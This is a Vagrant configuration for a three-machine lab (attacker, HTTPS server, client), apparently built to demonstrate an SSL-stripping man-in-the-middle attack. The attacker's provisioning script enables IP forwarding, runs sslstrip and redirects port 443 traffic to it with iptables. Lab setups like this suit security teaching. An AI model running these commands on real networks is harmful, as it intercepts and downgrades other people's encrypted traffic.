# -*- mode: ruby -*-
# vi: set ft=ruby :

# All Vagrant configuration is done below. The "2" in Vagrant.configure
# configures the configuration version (we support older styles for
# backwards compatibility). Please don't change it unless you know what
# you're doing.
ENV['VAGRANT_DEFAULT_PROVIDER'] = 'virtualbox'
$script_apache_ssl = <<SCRIPT
sudo yum install httpd -y
sudo yum install mod_ssl -y
echo "Redirect 301 / https://192.168.56.10" >> httpd.conf
sudo systemctl restart httpd
SCRIPT
$script_mitm = <<SCRIPT
sudo sysctl -w net.ipv4.ip_forward=1
sudo apt install sslstrip -y
sudo sslstrip -l 6666 &
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 6666
SCRIPT
$script_enable_xfce_gui = <<SCRIPT
sudo yum install epel-release -y
sudo yum groupinstall "X Window system" -y
sudo yum groupinstall "Xfce" -y
sudo yum install firefox -y
sudo systemctl isolate graphical.target
sudo systemctl set-default graphical.target
SCRIPT

Vagrant.configure("2") do |config|

  ##### DEFINE VM #####
  config.vm.define "attacker" do |config|
    config.vm.hostname = "attacker"
    config.vm.box = "kalilinux/rolling"
    config.vm.box_check_update = false
    config.vm.provision "shell", inline: $script_mitm
    config.vm.network "private_network", ip: "192.168.56.5"
    config.vm.provider :virtualbox do |v|
      v.memory = 1024
    end
  end
  config.vm.define "server" do |config|
    config.vm.hostname = "server"
    config.vm.box = "centos/7"
    config.vm.box_check_update = false
    config.vm.provision "shell", inline: $script_apache_ssl
    config.vm.network "private_network", ip: "192.168.56.10"
    config.vm.provider :virtualbox do |v|
      v.memory = 1024
    end
  end
  config.vm.define "client" do |config|
    config.vm.hostname = "client"
    config.vm.box = "centos/7"
    config.vm.box_check_update = false
    config.vm.provision "shell", inline: $script_enable_xfce_gui
    config.vm.network "private_network", ip: "192.168.56.3"
    config.vm.provider :virtualbox do |v|
      v.memory = 1024
      v.gui = true
    end
  end
end
